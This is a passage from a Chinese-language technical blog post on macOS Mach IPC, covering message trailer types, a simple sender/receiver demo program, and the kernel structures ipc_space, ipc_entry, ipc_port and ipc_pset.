class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">char</span> texts[<span class="number">0x20</span>];</span><br><span class="line">    <span class="type">int</span> integer;</span><br><span class="line">&#125; <span class="type">mach_msg_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_receive_t</span>;</span><br></pre></td></tr></table></figure><p>其中，<code>mach_msg_trailer_t</code>结构体中有如下几种字段：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line">    <span class="type">mach_msg_trailer_type_t</span>       msgh_trailer_type;</span><br><span class="line">    <span class="type">mach_msg_trailer_size_t</span>       msgh_trailer_size;</span><br><span class="line">&#125; <span class="type">mach_msg_trailer_t</span>;</span><br></pre></td></tr></table></figure><p>第一个字段表示 trailer 的类型，第二个字段表示接下来 trailer 的个数。</p><p>对于 trailer 类型来说，目前 Mac OSX 对用户层来说只提供了一种格式，即<code>MACH_MSG_TRAILER_FORMAT_0</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="type">unsigned</span> <span class="type">int</span> <span class="type">mach_msg_trailer_type_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TRAILER_FORMAT_0       0</span></span><br></pre></td></tr></table></figure><p>但是，该格式下有许多种 trailer 的类型，分别有：</p><ol><li><p><strong>mach_msg_trailer_t</strong>：一个空的 trailer，只包含了 type 和 size 字段。</p></li><li><p><strong>mach_msg_seqno_trailer_t</strong>：在第1个结构体的内存布局基础之上，额外增添第3个字段</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="type">natural_t</span> <span class="type">mach_port_seqno_t</span>;            <span class="comment">/* sequence number */</span></span><br><span class="line"></span><br><span class="line"><span class="type">mach_port_seqno_t</span>             msgh_seqno;</span><br></pre></td></tr></table></figure><p>sequence number，即消息序列号</p></li><li><p><strong>mach_msg_security_trailer_t</strong>：在第2个结构体之上，额外增添第4个字段：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">int</span>                  val[<span class="number">2</span>];</span><br><span class="line">&#125; <span class="type">security_token_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">security_token_t</span>              msgh_sender;</span><br></pre></td></tr></table></figure><p>security token 的两个整数分别表示发送方的 UID 和 GID。</p></li><li><p><strong>mach_msg_audit_trailer_t</strong>：在第3个结构体之上，额外增添第5个字段：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * The audit token is an opaque token which identifies</span></span><br><span class="line"><span class="comment"> * Mach tasks and senders of Mach messages as subjects</span></span><br><span class="line"><span class="comment"> * to the BSM audit system.  Only the appropriate BSM</span></span><br><span class="line"><span class="comment"> * library routines should be used to interpret the</span></span><br><span class="line"><span class="comment"> * contents of the audit token as the representation</span></span><br><span class="line"><span class="comment"> * of the subject identity within the token may change</span></span><br><span class="line"><span class="comment"> * over time.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">int</span>                  val[<span class="number">8</span>];</span><br><span class="line">&#125; <span class="type">audit_token_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">audit_token_t</span>                 msgh_audit;</span><br></pre></td></tr></table></figure><p>audit token 中共有 8 个整型，该 token 需要使用其他处理例程来进行解释。</p></li><li><p><strong>mach_msg_context_trailer_t</strong>：在第4个结构体之上，额外增添第6个字段</p></li><li><p><strong>mach_msg_mac_trailer_t</strong>：在第5个结构体之上，额外增添第7个字段</p></li><li><p><strong>mach_msg_max_trailer_t</strong>：在第6个结构体之上，额外增添第8个字段</p></li></ol><blockquote><p>可以看到，每一个 trailer 总是嵌套在下一个 trailer 之中，这有利于兼容。</p></blockquote><p>接收者在接收 mach messag 时，必须<strong>显式指定 mach_msg 函数的 option 字段</strong>，以说明<strong>接收的 trailer 的类型为 FORMAT_0</strong>，同时指定<strong>接收 trailer 时终止接收的那个字段</strong>。请看下面这个例子：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 等待 message</span></span><br><span class="line"><span class="type">mach_msg_receive_t</span> message;</span><br><span class="line"><span class="type">mach_msg_option_t</span> option = MACH_RCV_MSG </span><br><span class="line">    | <span class="built_in">MACH_RCV_TRAILER_TYPE</span>(MACH_MSG_TRAILER_FORMAT_0) </span><br><span class="line">    | <span class="built_in">MACH_RCV_TRAILER_ELEMENTS</span>(MACH_RCV_TRAILER_SENDER);</span><br><span class="line">kr = <span class="built_in">mach_msg</span>(&amp;message.recv_content.header, option,</span><br><span class="line">              <span class="number">0</span>, <span class="built_in">sizeof</span>(message), port,</span><br><span class="line">              MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);</span><br></pre></td></tr></table></figure><p>在这个例子中，option 设置了 <code>MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_SENDER)</code>，这个操作是为了<strong>指定接收 mach_msg_security_trailer_t 类型</strong>的 trailer，因为<strong>该类型的最后一个字段为 sender</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_RCV_TRAILER_NULL   0 <span class="comment">// mach_msg_trailer_t </span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_RCV_TRAILER_SEQNO  1 <span class="comment">// mach_msg_trailer_seqno_t </span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_RCV_TRAILER_SENDER 2 <span class="comment">// mach_msg_security_trailer_t </span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_RCV_TRAILER_AUDIT  3 <span class="comment">// mach_msg_audit_trailer_t</span></span></span><br></pre></td></tr></table></figure><p>以下是一个简单的测试例子：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">char</span> texts[<span class="number">0x20</span>];</span><br><span class="line">    <span class="type">int</span> integer;</span><br><span class="line">&#125; <span class="type">mach_msg_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_security_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_receive_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">sender</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Current UID(%d) GID(%d)\n&quot;</span>, <span class="built_in">getuid</span>(), <span class="built_in">getgid</span>());</span><br><span class="line">    <span class="built_in">usleep</span>(<span class="number">1000</span>);</span><br><span class="line">    <span class="comment">// 从 bootstrap 中查询并获取一个 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] bootstrap_look_up() returned port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 构造待发送的信息</span></span><br><span class="line">    <span class="type">mach_msg_send_t</span> message;</span><br><span class="line"></span><br><span class="line">    message.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>);</span><br><span class="line">    message.header.msgh_remote_port = port;</span><br><span class="line">    message.header.msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">    message.header.msgh_size = <span class="built_in">sizeof</span>(message);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">strcpy</span>(message.texts, <span class="string">&quot;Hello, I&#x27;m sender&quot;</span>);</span><br><span class="line">    message.integer = <span class="number">123</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将其发送</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;message.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Message is sent.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 创建一个带有接收权限的 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 给该 port 再增加一个发送权限</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询</span></span><br><span class="line">    kr = <span class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 等待 message</span></span><br><span class="line">    <span class="type">mach_msg_receive_t</span> message;</span><br><span class="line">    <span class="type">mach_msg_option_t</span> option = MACH_RCV_MSG </span><br><span class="line">                            | <span class="built_in">MACH_RCV_TRAILER_TYPE</span>(MACH_MSG_TRAILER_FORMAT_0) </span><br><span class="line">                            | <span class="built_in">MACH_RCV_TRAILER_ELEMENTS</span>(MACH_RCV_TRAILER_SENDER);</span><br><span class="line">    kr = <span class="built_in">mach_msg</span>(&amp;message.recv_content.header, option,</span><br><span class="line">            <span class="number">0</span>, <span class="built_in">sizeof</span>(message), port,</span><br><span class="line">            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Got a message\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Text: %s, number: %d\n&quot;</span>, message.recv_content.texts, message.recv_content.integer);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Security token = UID(%u) GID(%u)\n&quot;</span>, </span><br><span class="line">           message.trailer.msgh_sender.val[<span class="number">0</span>],  <span class="comment">// sender&#x27;s user ID </span></span><br><span class="line">           message.trailer.msgh_sender.val[<span class="number">1</span>]); <span class="comment">// sender&#x27;s group ID</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> * argv[])</span> </span>&#123;</span><br><span class="line">    fork() ? <span class="built_in">sender</span>() : <span class="built_in">receiver</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>测试结果：</p><p><img src="/2021/12/mach_ipc_intro/image-20211230155320740.png" alt="image-20211230155320740"></p><h2 id="六、部分内核类型介绍">六、部分内核类型介绍</h2><h3 id="1-ipc-space">1. ipc_space</h3><p>对于 task 结构体中，其内部存在一个 <code>struct ipc_space *itk_space</code> 的字段，以存放当前 task 所使用的 IPC 信息，其结构体定义如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_space</span> &#123;</span><br><span class="line">    <span class="type">lck_spin_t</span>    is_lock_data;</span><br><span class="line">    <span class="type">ipc_space_refs_t</span> is_bits;    <span class="comment">/* holds refs, active, growing */</span></span><br><span class="line">    <span class="type">ipc_entry_num_t</span> is_table_size;    <span class="comment">/* current size of table */</span></span><br><span class="line">    <span class="type">ipc_entry_num_t</span> is_table_free;    <span class="comment">/* count of free elements */</span></span><br><span class="line">    <span class="type">ipc_entry_t</span> is_table;        <span class="comment">/* an array of entries */</span></span><br><span class="line">    <span class="type">task_t</span> is_task;                 <span class="comment">/* associated task */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_table_size</span> *is_table_next; <span class="comment">/* info for larger table */</span></span><br><span class="line">    <span class="type">ipc_entry_num_t</span> is_low_mod;    <span class="comment">/* lowest modified entry during growth */</span></span><br><span class="line">    <span class="type">ipc_entry_num_t</span> is_high_mod;    <span class="comment">/* highest modified entry during growth */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">bool_gen</span> bool_gen;       <span class="comment">/* state for boolean RNG */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> is_entropy[IS_ENTROPY_CNT]; <span class="comment">/* pool of entropy taken from RNG */</span></span><br><span class="line">    <span class="type">int</span> is_node_id;            <span class="comment">/* HOST_LOCAL_NODE, or remote node if proxy space */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>字段 <code>is_table</code> 指向一个元素类型为 <code>struct ipc_entry</code> 的数组，长度为 <code>is_table_size</code>，通常用户层使用的 mach port name （整型表示）将会映射到内核层的该结构体。<code>is_table</code> 在创建时就会存放一些初始条目。</p><p>字段 <code>is_bits</code> 包含了较多的控制信息，例如引用计数、当前 ipc_space <strong>是否激活(active)</strong> 以及<strong>当前 ipc_space是否正在增大内存空间(growing)</strong>。其中 growing 位是为了<strong>防止条件竞争</strong>所设定的一个简单比特。内核使用 ipc_space 时，如果发现当前 ipc_space 的 is_table 大小不够，则会尝试进行 grow 操作；但如果<strong>当前</strong>内核线程发现<strong>当前 ipc_space 正在被其他内核线程 growing 时</strong>，则会<strong>先休眠(is_write_sleep)</strong>，直到其他线程完成处理后再来进行接下来的操作。</p><p>当某个 mach port 的 <strong>receive right 被释放</strong>了，则这个 mach port 便<strong>视为被释放</strong>了，若此时持有该 mach port 的引用为 0 ，则 is_table 中对应的 ipc_entry 结构体将被<strong>移动至 is_table_free 中</strong>，并且被释放的 mach port 的所有 right 都被更改为 MACH_PORT_RIGHT_DEAD_NAME，表示这些 right 全都 dead。</p><blockquote><p>这种机制是为了，防止所接管的 port name 被过早的重用。</p></blockquote><p>若当前的 ipc_space 需要创建一个新的 ipc_entry 时，首先 ipc_space 会尝试从 is_table_free 中取出最早被释放的 ipc_entry（即 <strong>is_table_free 为 FIFO</strong>）并重用；但若 is_table_free 为空，则将尝试 <strong>扩大（grow）</strong> ipc_space，并插入一个新的 ipc_entry 结构体。</p><blockquote><p>需要注意的是，即便某个 mach port 的 receive right 已经被释放了，那么如果该 mach port 的引用不为 0 （此时 mach port 的各个 right 为 Dead name），则在下次分配 mach port 时，仍然不能重用该 mach port name。</p></blockquote><h3 id="2-ipc-entry">2. ipc_entry</h3><p>用户层的 mach port name（整数表示）实际上对应至内核中 <code>task-&gt;ipc_space-&gt;is_table</code> 上的某个 ipc_entry 条目。而 ipc_entry 结构声明如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_entry</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_object</span> *ie_object;</span><br><span class="line">    <span class="type">ipc_entry_bits_t</span> ie_bits;</span><br><span class="line">    <span class="type">mach_port_index_t</span> ie_index;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="type">mach_port_index_t</span> next;        <span class="comment">/* next in freelist, or...  */</span></span><br><span class="line">        <span class="type">ipc_table_index_t</span> request;    <span class="comment">/* dead name request notify */</span></span><br><span class="line">    &#125; index;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>其中 <code>ie_object</code> 指针字段，实际指向的结构体有两种：<code>ipc_port</code>、<code>ipc_pset</code>。</p><p><code>ie_bits</code> 标志位字段保存了给定 port name 所代表的 right 类型。</p><h3 id="3-ipc-port">3. ipc_port</h3><p>ipc_port  结构体，对应于单个 mach port。该结构体记录了 Mach message 队列、mach port 的接收方和发送方 port、内核存储的相关数据等等。这些字段不一一解释，有用到再说。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * Initial sub-structure in common with ipc_pset</span></span><br><span class="line"><span class="comment">     * First element is an ipc_object second is a</span></span><br><span class="line"><span class="comment">     * message queue</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_object</span> ip_object;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_mqueue</span> ip_messages;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">ipc_space</span> *receiver;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">ipc_port</span> *destination;</span><br><span class="line">        <span class="type">ipc_port_timestamp_t</span> timestamp;</span><br><span class="line">    &#125; data;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="type">ipc_kobject_t</span> kobject;</span><br><span class="line">        <span class="type">ipc_importance_task_t</span> imp_task;</span><br><span class="line">        <span class="type">ipc_port_t</span> sync_qos_override_port;</span><br><span class="line">    &#125; kdata;</span><br><span class="line">        </span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_port</span> *ip_nsrequest;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_port</span> *ip_pdrequest;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_port_request</span> *ip_requests;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">ipc_kmsg</span> *premsg;</span><br><span class="line">        <span class="keyword">struct</span> &#123;</span><br><span class="line">            <span class="type">sync_qos_count_t</span> sync_qos[THREAD_QOS_LAST];</span><br><span class="line">            <span class="type">sync_qos_count_t</span> special_port_qos;</span><br><span class="line">        &#125; qos_counter;</span><br><span class="line">    &#125; kdata2;</span><br><span class="line"></span><br><span class="line">    <span class="type">mach_vm_address_t</span> ip_context;</span><br><span class="line"></span><br><span class="line">    <span class="type">natural_t</span> ip_sprequests:<span class="number">1</span>,    <span class="comment">/* send-possible requests outstanding */</span></span><br><span class="line">          ip_spimportant:<span class="number">1</span>,    <span class="comment">/* ... at least one is importance donating */</span></span><br><span class="line">          ip_impdonation:<span class="number">1</span>,    <span class="comment">/* port supports importance donation */</span></span><br><span class="line">          ip_tempowner:<span class="number">1</span>,    <span class="comment">/* dont give donations to current receiver */</span></span><br><span class="line">          ip_guarded:<span class="number">1</span>,         <span class="comment">/* port guarded (use context value as guard) */</span></span><br><span class="line">          ip_strict_guard:<span class="number">1</span>,    <span class="comment">/* Strict guarding; Prevents user manipulation of context values directly */</span></span><br><span class="line">          ip_specialreply:<span class="number">1</span>,    <span class="comment">/* port is a special reply port */</span></span><br><span class="line">          ip_link_sync_qos:<span class="number">1</span>,    <span class="comment">/* link the special reply port to destination port */</span></span><br><span class="line">          ip_impcount:<span class="number">24</span>;    <span class="comment">/* number of importance donations in nested queue */</span></span><br><span class="line"></span><br><span class="line">    <span class="type">mach_port_mscount_t</span> ip_mscount;</span><br><span class="line">    <span class="type">mach_port_rights_t</span> ip_srights;</span><br><span class="line">    <span class="type">mach_port_rights_t</span> ip_sorights;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> MACH_ASSERT</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> IP_NSPARES  4</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> IP_CALLSTACK_MAX    16</span></span><br><span class="line"><span class="comment">/*  queue_chain_t   ip_port_links;*/</span><span class="comment">/* all allocated ports */</span></span><br><span class="line">    <span class="type">thread_t</span>    ip_thread;  <span class="comment">/* who made me?  thread context */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span>   ip_timetrack;   <span class="comment">/* give an idea of &quot;when&quot; created */</span></span><br><span class="line">    <span class="type">uintptr_t</span>   ip_callstack[IP_CALLSTACK_MAX]; <span class="comment">/* stack trace */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span>   ip_spares[IP_NSPARES]; <span class="comment">/* for debugging */</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span>  <span class="comment">/* MACH_ASSERT */</span></span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h3 id="4-ipc-pset">4. ipc_pset</h3><p>ipc_pset 结构体，对应于多个 mach port 的集合。以下是其声明：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_pset</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * Initial sub-structure in common with all ipc_objects.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_object</span>    ips_object;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_mqueue</span>    ips_messages;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><blockquote><p>注意到上面这两个结构体的<strong>第一个字段都是 <code>struct ipc_object</code> 字段</strong>。</p><p>因此当 ipc_entry 中的 ie_object 指针指向这两个<strong>结构体中的 ipc_object 结构体字段</strong>时，这种指向关系也<strong>等价于直接指向这两个结构体的基地址</strong>。</p></blockquote><h3 id="5-mach-port-t-与-mach-port-name-t">5. mach_port_t 与 mach_port_name_t</h3><blockquote><p><strong>注：这一节较为重要。</strong></p></blockquote><p>在用户层调用 mach API 时，我们经常会看到 <code>mach_port_t</code> 与 <code>mach_port_name_t</code> 类型，并很容易<strong>将这些类型混淆</strong>（至少我学 mach 的时候经常混）。</p><p>引起混淆的原因很简单</p><ol><li>用户层输出这两个类型的值<strong>都是同一个整型数值</strong></li><li>使用某些 mach API 时，经常将 <code>mach_port_t</code> 类型的值直接作为 <code>mach_port_name_t</code> 类型的函数参数。</li><li>被一些函数声明给混淆了。明明是<code>mach_port_t</code>类型的参数，偏偏参数名为 